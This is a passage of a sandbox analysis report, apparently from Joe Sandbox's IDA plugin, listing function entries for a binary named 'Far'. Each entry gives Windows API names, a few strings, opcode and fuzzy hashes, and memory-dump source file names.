                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                      • API String ID: 0-2263619337
                                                                                                                                                                      • Opcode ID: 32bafa7ef6ef81ba380613d46986f1983d7e1ef1ee3d166cfad7bff082adc519
                                                                                                                                                                      • Instruction ID: 42356c1fe2dd0781698766bac86ace877c99f5646a2cbf9810cb6a4b7cae45a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 32bafa7ef6ef81ba380613d46986f1983d7e1ef1ee3d166cfad7bff082adc519
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A51AE32F0DA1AA5EB61EBE9D4841BCA375EB85F84F948131DA0D077A5EF39D401D360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 43455801-0
                                                                                                                                                                      • Opcode ID: 7c5ec83602a7b85680bd54c12d61fd59ea10761cfb16aa1bc7a2b04db0578af0
                                                                                                                                                                      • Instruction ID: 0368ab85dc723b3b62577e5337dbe468abc68ff405b45a8dbf06e00ab97a6d67
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c5ec83602a7b85680bd54c12d61fd59ea10761cfb16aa1bc7a2b04db0578af0
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C11BF31B1C29A92E704AB56B8047ADB764FB85F95F984530CF0603B51EFBEA4498740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 179993514-0
                                                                                                                                                                      • Opcode ID: 089465f911adc8c7e682e709ec820840154c33e6ab5af755f8b41bca33469a29
                                                                                                                                                                      • Instruction ID: 0cb679b7fa393674e18bfd630f0e07207974d99769e2a1ddd180a57715692ce8
                                                                                                                                                                      • Opcode Fuzzy Hash: 089465f911adc8c7e682e709ec820840154c33e6ab5af755f8b41bca33469a29
                                                                                                                                                                      • Instruction Fuzzy Hash: 93F0A421F1D75953F7506BB1A8887ADA3A6BF88B40FD44034C94E02754EF7DD0589610
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF73D0DD073), ref: 00007FF73D0DDF55
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                      • API String ID: 2358735015-567219261
                                                                                                                                                                      • Opcode ID: 596d56039ffc454664d2610678aac10527d1be7abd595b63392a345406aeae23
                                                                                                                                                                      • Instruction ID: 61b2bea6f57cc5103bddb21c9b43eccf6f0c617fc7a3ad7e96fc7754a814ae84
                                                                                                                                                                      • Opcode Fuzzy Hash: 596d56039ffc454664d2610678aac10527d1be7abd595b63392a345406aeae23
                                                                                                                                                                      • Instruction Fuzzy Hash: E491D433B1C66BA1EA10AFA598505BDA7A0BB14F44B904132DE9D537C4FF3DE851E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                                                                      • Opcode ID: fe21cca23407ee4859f44099e968b1b2fc433a712d7dc1e4ae65f9be9f94580b
                                                                                                                                                                      • Instruction ID: 8771714851211bbde945715bcc732722e5d873a55945640c4fa99e87f95968aa
                                                                                                                                                                      • Opcode Fuzzy Hash: fe21cca23407ee4859f44099e968b1b2fc433a712d7dc1e4ae65f9be9f94580b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1791AD27B0CB5AA5EB10EFA5D4902ADB3B4EB84F98B844436DE4E07755EF38D405D360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharForegroundUpperWindow
                                                                                                                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                                                                                      • API String ID: 3570115564-1994484594
                                                                                                                                                                      • Opcode ID: 309538ca5d9b6b6061fbefc7caf82ec96f6b638cc3f26694e18a0b0e8655f041
                                                                                                                                                                      • Instruction ID: f170152d1e5dc600193700bb23c1a3372f89e0d75ae5037a54f29b71683ca293
                                                                                                                                                                      • Opcode Fuzzy Hash: 309538ca5d9b6b6061fbefc7caf82ec96f6b638cc3f26694e18a0b0e8655f041
                                                                                                                                                                      • Instruction Fuzzy Hash: B971C212F0CA0BA1EA64BBE1D4013B9E3A1AF54F84FC44431DA4E87685FF7CE548A361
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID: #$E$O
                                                                                                                                                                      • API String ID: 3215553584-248080428
                                                                                                                                                                      • Opcode ID: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                                                                                      • Instruction ID: 85b90fa07ae09138c91edfd1bb3696839de30e44ff16ca2ce5ba2e8b6df18f9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ec0da66385ca5cfa3e6e9d06278922857a071159ec432c0170ef47ddb72b8c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 5641B326A1D75994EF51AFA198401BEA3A0BF54F88F884431EE4D1B788EF3ED441E720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: afb4a62be29347168b42662bc3e650bd235de2c76d17d961c5843a48846b1531
                                                                                                                                                                      • Instruction ID: df3d4feaf6215d6cb6b5caebf3054ca649f60000690f9b10f610b31cf6ea538c
                                                                                                                                                                      • Opcode Fuzzy Hash: afb4a62be29347168b42662bc3e650bd235de2c76d17d961c5843a48846b1531
                                                                                                                                                                      • Instruction Fuzzy Hash: 08F08161B1E64AA1EF44AF91F4902B8A3A4EF88F80FD41035E94F42654EF2CD448D620
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLasthtonsinet_ntoa
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2227131780-0
                                                                                                                                                                      • Opcode ID: b8412e8eb80b69da258664e80ccf32a33d46311eecff775981195d72280db8fd
                                                                                                                                                                      • Instruction ID: ed675c1d8a8e3ba8535a1c31010173a01dbe456fc637245b03f4fc99bf40a346
                                                                                                                                                                      • Opcode Fuzzy Hash: b8412e8eb80b69da258664e80ccf32a33d46311eecff775981195d72280db8fd
                                                                                                                                                                      • Instruction Fuzzy Hash: 02A1F662B0C64AA1DA10FBA6D4646BEE7A1FF81F84F804532DE4E47796EF3CD1059B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                      • Opcode ID: bbf055172a3d456f69b0e07664c541ced1dd4fe7ea429e82dbb20806ceed39ac
                                                                                                                                                                      • Instruction ID: 4ba6d4c22f2ad8a256b1a3888dfb10bf181253739a72bd60dfefe6871be9864d
                                                                                                                                                                      • Opcode Fuzzy Hash: bbf055172a3d456f69b0e07664c541ced1dd4fe7ea429e82dbb20806ceed39ac
                                                                                                                                                                      • Instruction Fuzzy Hash: E281D122B0C69695EB14EFA6C528ABDABA0BB48FC4F848031DE0D17796EF3CD401D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 9db25d0a3234ccf5d863845c83a8ddb1a3b988ca091e57f486abf52e8bc045d2
                                                                                                                                                                      • Instruction ID: f79c5bb157f5902811fe8bf7cfa033603ef7e4d7762c906c95002ffae5d9b1e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 9db25d0a3234ccf5d863845c83a8ddb1a3b988ca091e57f486abf52e8bc045d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 6981A022F1C65AA6F720BBA594406BDABA0BB44F54FC04135DE1E1B695EF3CE442E730
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                      • Opcode ID: 9127a972c162cbac40c62116804b3e347b50689ba121df17bb24bde030dc29d4
                                                                                                                                                                      • Instruction ID: 092802efb7aadd399d0da373722262fd48312354315894958e6a776209637f81
                                                                                                                                                                      • Opcode Fuzzy Hash: 9127a972c162cbac40c62116804b3e347b50689ba121df17bb24bde030dc29d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 14512232B0C656ABE358EF72D4405A9B764FB08B54F500235EF6E43B85DF38E4519B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 190572456-0
                                                                                                                                                                      • Opcode ID: e71795fefc77e1d432e1abb1b11e1854833eb482a710277cf669d7f771635b40
                                                                                                                                                                      • Instruction ID: 7a70bbe72ca37a7ceb9ce5dadc3ace237e9cd5b6413394c7115478bacfa0c655
                                                                                                                                                                      • Opcode Fuzzy Hash: e71795fefc77e1d432e1abb1b11e1854833eb482a710277cf669d7f771635b40
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A41E661B0E64EA1FA11BB91A8046B9E3A5BF44F90F894535ED2D4F784FF3CE40463A4
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                      • Opcode ID: 70514b9b7d05f2a3f30778e794a0a893e1136449a4d60a970c1cae28c2705a0b
                                                                                                                                                                      • Instruction ID: 46d07f2db35b61fe4755f3d43961d710b8be274ca9887bf470f4cb549cb37d8c
                                                                                                                                                                      • Opcode Fuzzy Hash: 70514b9b7d05f2a3f30778e794a0a893e1136449a4d60a970c1cae28c2705a0b
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F218022B08A5992EB04EFA7E8940ADA3A1FB88F90B944036DE4D87756EF7CD441D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _set_statfp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1156100317-0
                                                                                                                                                                      • Opcode ID: 73dca32b358ad2077a7c5345a735f46d455ad7c227746cbdc11ebc546046a131
                                                                                                                                                                      • Instruction ID: 002b08b6824bd9811d2f7129f37ae17d33c943ff460bb88cb15dd51aeaf8363e
                                                                                                                                                                      • Opcode Fuzzy Hash: 73dca32b358ad2077a7c5345a735f46d455ad7c227746cbdc11ebc546046a131
                                                                                                                                                                      • Instruction Fuzzy Hash: 0B11E723E0CB0B31F65435E6D542379D842BF42B70F894630F67D4A5EAAF6CA440A120
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 44706859-0
                                                                                                                                                                      • Opcode ID: e3925e5b63fc2b2835a4c8602648939fc0ba2a9a5fe920ccfee8e4a2bc238299
                                                                                                                                                                      • Instruction ID: 63d568301b164f3335333f5cfb8e43d6d07ca481dd21ae467df2dc7cb6a8c792
                                                                                                                                                                      • Opcode Fuzzy Hash: e3925e5b63fc2b2835a4c8602648939fc0ba2a9a5fe920ccfee8e4a2bc238299
                                                                                                                                                                      • Instruction Fuzzy Hash: 06118836608B9186E754DF42E88059DB7A8FB88F90BA94435CF9903B14FF38E811C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
